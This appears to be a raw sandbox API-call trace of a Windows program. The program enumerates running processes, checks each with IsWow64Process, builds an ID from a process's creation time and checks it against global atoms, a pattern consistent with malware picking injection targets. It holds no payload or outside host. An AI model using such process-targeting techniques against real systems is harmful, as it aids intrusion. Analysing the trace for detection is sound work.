	[0126.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.478] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.478] CloseHandle (hObject=0x2dc) returned 1
	[0126.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.479] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.479] CloseHandle (hObject=0x2dc) returned 1
	[0126.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0126.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.479] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.479] CloseHandle (hObject=0x2dc) returned 1
	[0126.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.480] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.480] CloseHandle (hObject=0x2dc) returned 1
	[0126.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.480] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.480] CloseHandle (hObject=0x2dc) returned 1
	[0126.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.480] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.480] CloseHandle (hObject=0x2dc) returned 1
	[0126.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.481] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.481] CloseHandle (hObject=0x2dc) returned 1
	[0126.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.481] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.481] CloseHandle (hObject=0x2dc) returned 1
	[0126.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.482] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.482] CloseHandle (hObject=0x2dc) returned 1
	[0126.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.482] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.482] CloseHandle (hObject=0x2dc) returned 1
	[0126.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.482] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.483] CloseHandle (hObject=0x2dc) returned 1
	[0126.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.483] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.483] CloseHandle (hObject=0x2dc) returned 1
	[0126.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.483] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.483] CloseHandle (hObject=0x2dc) returned 1
	[0126.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0126.484] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.484] CloseHandle (hObject=0x2dc) returned 1
	[0126.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0126.484] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.484] CloseHandle (hObject=0x2dc) returned 1
	[0126.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.485] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.485] CloseHandle (hObject=0x2dc) returned 1
	[0126.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.485] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.485] CloseHandle (hObject=0x2dc) returned 1
	[0126.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.485] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.486] CloseHandle (hObject=0x2dc) returned 1
	[0126.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.486] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.486] CloseHandle (hObject=0x2dc) returned 1
	[0126.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.486] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.486] CloseHandle (hObject=0x2dc) returned 1
	[0126.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.487] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.487] CloseHandle (hObject=0x2dc) returned 1
	[0126.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.487] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.487] CloseHandle (hObject=0x2dc) returned 1
	[0126.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0126.487] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.488] CloseHandle (hObject=0x2dc) returned 1
	[0126.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.488] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.488] CloseHandle (hObject=0x2dc) returned 1
	[0126.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.489] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.489] CloseHandle (hObject=0x2dc) returned 1
	[0126.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.489] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.489] CloseHandle (hObject=0x2dc) returned 1
	[0126.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.489] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.490] CloseHandle (hObject=0x2dc) returned 1
	[0126.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.490] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.490] CloseHandle (hObject=0x2dc) returned 1
	[0126.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0126.490] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.490] CloseHandle (hObject=0x2dc) returned 1
	[0126.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0126.491] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.491] CloseHandle (hObject=0x2dc) returned 1
	[0126.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.491] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetLastError () returned 0x5
	[0126.492] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.493] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0126.493] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.493] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0126.493] GetLastError () returned 0x5
	[0126.493] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.494] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetLastError () returned 0x5
	[0126.495] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.495] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0126.496] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.496] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0126.496] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0126.496] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0126.496] CloseHandle (hObject=0x2dc) returned 1
	[0126.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0126.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.496] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.497] CloseHandle (hObject=0x2dc) returned 1
